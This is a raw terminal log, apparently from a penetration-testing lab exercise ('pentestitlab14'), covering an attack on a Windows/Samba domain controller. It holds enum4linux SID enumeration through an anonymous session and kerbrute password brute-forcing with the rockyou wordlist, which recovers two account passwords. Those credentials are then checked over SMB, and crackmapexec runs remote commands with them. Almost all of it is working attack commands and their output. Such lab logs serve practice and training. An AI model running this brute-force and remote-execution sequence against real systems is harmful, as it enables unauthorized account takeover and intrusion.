S-1-5-21-518050695-217262318-2335301019-523 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-524 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-525 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-526 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-527 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-528 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-529 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-530 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-531 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-532 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-533 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-534 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-535 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-536 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-537 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-538 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-539 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-540 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-541 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-542 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-543 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-544 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-545 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-546 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-547 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-548 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-549 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-550 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1000 TEST\AD1$ (Local User)

S-1-5-21-518050695-217262318-2335301019-1001 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1002 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1003 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1004 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1005 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1006 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1007 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1008 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1009 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1010 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1011 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1012 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1013 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1014 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1015 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1016 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1017 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1018 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1019 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1020 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1021 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1022 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1023 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1024 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1025 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1026 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1027 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1028 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1029 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1030 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1031 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1032 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1033 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1034 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1035 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1036 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1037 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1038 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1039 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1040 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1041 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1042 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1043 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1044 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1045 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1046 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1047 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1048 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1049 *unknown*\*unknown* (8)

S-1-5-21-518050695-217262318-2335301019-1050 *unknown*\*unknown* (8)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-500 *unknown*\*unknown* (8)

S-1-5-32-501 *unknown*\*unknown* (8)

S-1-5-32-502 *unknown*\*unknown* (8)

S-1-5-32-503 *unknown*\*unknown* (8)

S-1-5-32-504 *unknown*\*unknown* (8)

S-1-5-32-505 *unknown*\*unknown* (8)

S-1-5-32-506 *unknown*\*unknown* (8)

S-1-5-32-507 *unknown*\*unknown* (8)

S-1-5-32-508 *unknown*\*unknown* (8)

S-1-5-32-509 *unknown*\*unknown* (8)

S-1-5-32-510 *unknown*\*unknown* (8)

S-1-5-32-511 *unknown*\*unknown* (8)

S-1-5-32-512 *unknown*\*unknown* (8)

S-1-5-32-513 *unknown*\*unknown* (8)

S-1-5-32-514 *unknown*\*unknown* (8)

S-1-5-32-515 *unknown*\*unknown* (8)

S-1-5-32-516 *unknown*\*unknown* (8)

S-1-5-32-517 *unknown*\*unknown* (8)

S-1-5-32-518 *unknown*\*unknown* (8)

S-1-5-32-519 *unknown*\*unknown* (8)

S-1-5-32-520 *unknown*\*unknown* (8)

S-1-5-32-521 *unknown*\*unknown* (8)

S-1-5-32-522 *unknown*\*unknown* (8)

S-1-5-32-523 *unknown*\*unknown* (8)

S-1-5-32-524 *unknown*\*unknown* (8)

S-1-5-32-525 *unknown*\*unknown* (8)

S-1-5-32-526 *unknown*\*unknown* (8)

S-1-5-32-527 *unknown*\*unknown* (8)

S-1-5-32-528 *unknown*\*unknown* (8)

S-1-5-32-529 *unknown*\*unknown* (8)

S-1-5-32-530 *unknown*\*unknown* (8)

S-1-5-32-531 *unknown*\*unknown* (8)

S-1-5-32-532 *unknown*\*unknown* (8)

S-1-5-32-533 *unknown*\*unknown* (8)

S-1-5-32-534 *unknown*\*unknown* (8)

S-1-5-32-535 *unknown*\*unknown* (8)

S-1-5-32-536 *unknown*\*unknown* (8)

S-1-5-32-537 *unknown*\*unknown* (8)

S-1-5-32-538 *unknown*\*unknown* (8)

S-1-5-32-539 *unknown*\*unknown* (8)

S-1-5-32-540 *unknown*\*unknown* (8)

S-1-5-32-541 *unknown*\*unknown* (8)

S-1-5-32-542 *unknown*\*unknown* (8)

S-1-5-32-543 *unknown*\*unknown* (8)

S-1-5-32-544 BUILTIN\Administrators (Local Group)

S-1-5-32-545 BUILTIN\Users (Local Group)

S-1-5-32-546 BUILTIN\Guests (Local Group)

S-1-5-32-547 *unknown*\*unknown* (8)

S-1-5-32-548 BUILTIN\Account Operators (Local Group)

S-1-5-32-549 BUILTIN\Server Operators (Local Group)

S-1-5-32-550 BUILTIN\Print Operators (Local Group)

S-1-5-32-1000 *unknown*\*unknown* (8)

S-1-5-32-1001 *unknown*\*unknown* (8)

S-1-5-32-1002 *unknown*\*unknown* (8)

S-1-5-32-1003 *unknown*\*unknown* (8)

S-1-5-32-1004 *unknown*\*unknown* (8)

S-1-5-32-1005 *unknown*\*unknown* (8)

S-1-5-32-1006 *unknown*\*unknown* (8)

S-1-5-32-1007 *unknown*\*unknown* (8)

S-1-5-32-1008 *unknown*\*unknown* (8)

S-1-5-32-1009 *unknown*\*unknown* (8)

S-1-5-32-1010 *unknown*\*unknown* (8)

S-1-5-32-1011 *unknown*\*unknown* (8)

S-1-5-32-1012 *unknown*\*unknown* (8)

S-1-5-32-1013 *unknown*\*unknown* (8)

S-1-5-32-1014 *unknown*\*unknown* (8)

S-1-5-32-1015 *unknown*\*unknown* (8)

S-1-5-32-1016 *unknown*\*unknown* (8)

S-1-5-32-1017 *unknown*\*unknown* (8)

S-1-5-32-1018 *unknown*\*unknown* (8)

S-1-5-32-1019 *unknown*\*unknown* (8)

S-1-5-32-1020 *unknown*\*unknown* (8)

S-1-5-32-1021 *unknown*\*unknown* (8)

S-1-5-32-1022 *unknown*\*unknown* (8)

S-1-5-32-1023 *unknown*\*unknown* (8)

S-1-5-32-1024 *unknown*\*unknown* (8)

S-1-5-32-1025 *unknown*\*unknown* (8)

S-1-5-32-1026 *unknown*\*unknown* (8)

S-1-5-32-1027 *unknown*\*unknown* (8)

S-1-5-32-1028 *unknown*\*unknown* (8)

S-1-5-32-1029 *unknown*\*unknown* (8)

S-1-5-32-1030 *unknown*\*unknown* (8)

S-1-5-32-1031 *unknown*\*unknown* (8)

S-1-5-32-1032 *unknown*\*unknown* (8)

S-1-5-32-1033 *unknown*\*unknown* (8)

S-1-5-32-1034 *unknown*\*unknown* (8)

S-1-5-32-1035 *unknown*\*unknown* (8)

S-1-5-32-1036 *unknown*\*unknown* (8)

S-1-5-32-1037 *unknown*\*unknown* (8)

S-1-5-32-1038 *unknown*\*unknown* (8)

S-1-5-32-1039 *unknown*\*unknown* (8)

S-1-5-32-1040 *unknown*\*unknown* (8)

S-1-5-32-1041 *unknown*\*unknown* (8)

S-1-5-32-1042 *unknown*\*unknown* (8)

S-1-5-32-1043 *unknown*\*unknown* (8)

S-1-5-32-1044 *unknown*\*unknown* (8)

S-1-5-32-1045 *unknown*\*unknown* (8)

S-1-5-32-1046 *unknown*\*unknown* (8)

S-1-5-32-1047 *unknown*\*unknown* (8)

S-1-5-32-1048 *unknown*\*unknown* (8)

S-1-5-32-1049 *unknown*\*unknown* (8)

S-1-5-32-1050 *unknown*\*unknown* (8)

============================================

| Getting printer info for 172.16.0.20 |

============================================

No printers returned.

enum4linux complete on Thu Feb 13 16:35:40 2020

root@kali ~/ctf/pentestitlab14

root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt sidorov -t 200 1 ↵ ⚡ 3612 18:40:36

__ __ __

/ /_____ _____/ /_ _______ __/ /____

/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \

/ ,< / __/ / / /_/ / / / /_/ / /_/ __/

/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop

2020/02/13 18:40:52 > Using KDC(s):

2020/02/13 18:40:52 > 172.16.0.20:88

2020/02/13 18:41:23 > [+] VALID LOGIN:sidorov@test.lab:1234qwer

2020/02/13 18:41:26 > Done! Tested 3277 logins (1 successes) in 34.014 seconds

root@kali /opt/kerbrute/dist master v1.0.3

root@kali ~/ctf/pentestitlab14/vpn2 smbclient -L 172.16.0.20 -U 'sidorov@test.lab' -p 1234qwer

Enter sidorov@test.lab's password:

Sharename Type Comment

--------- ---- -------

netlogon Disk

sysvol Disk

IPC$ IPC IPC Service (Samba 4.5.16-Debian)

SMB1 disabled -- no workgroup available

root@kali ~/ctf/pentestitlab14/vpn2

root@kali ~/ctf/pentestitlab14 crackmapexec smb 172.16.0.20 -u 'sidorov@test.lab' -p 1234qwer -x whoami

SMB 172.16.0.20 445 DC2 [*] Windows 6.1 (name:DC2) (domain:TEST) (signing:True) (SMBv1:True)

SMB 172.16.0.20 445 DC2 [+] TEST\sidorov@test.lab:1234qwer

root@kali ~/ctf/pentestitlab14

root@kali /opt/kerbrute/dist master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt petrov -t 200 ✔ ⚡ 3676 19:10:47

__ __ __

/ /_____ _____/ /_ _______ __/ /____

/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \

/ ,< / __/ / / /_/ / / / /_/ / /_/ __/

/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop

2020/02/13 19:10:56 > Using KDC(s):

2020/02/13 19:10:56 > 172.16.0.20:88

2020/02/13 19:12:16 > [+] VALID LOGIN:petrov@test.lab:P@ssw0rd

2020/02/13 19:12:20 > Done! Tested 8182 logins (1 successes) in 83.873 seconds

root@kali /opt/kerbrute/dist master v1.0.3

root@kali ~/ctf/pentestitlab14 smbclient -L 172.16.0.20 -U 'petrov@test.lab' ✔ ⚡ 3747 19:18:44

Enter petrov@test.lab's password:

Sharename Type Comment

--------- ---- -------

netlogon Disk

sysvol Disk

IPC$ IPC IPC Service (Samba 4.5.16-Debian)

SMB1 disabled -- no workgroup available

root@kali ~/ctf/pentestitlab14 cme smb 172.16.0.20 -u 'petrov@test.lab' -p 'P@ssw0rd' -x whoami ✔ ⚡ 3748 19:20:36

CME 172.16.0.20:445 DC2 [*] Windows 6.1 Build 0 (name:DC2) (domain:TEST)

CME 172.16.0.20:445 DC2 [+] TEST\petrov@test.lab:P@ssw0rd

[*] KTHXBYE!

root@kali ~/ctf/pentestitlab14

↧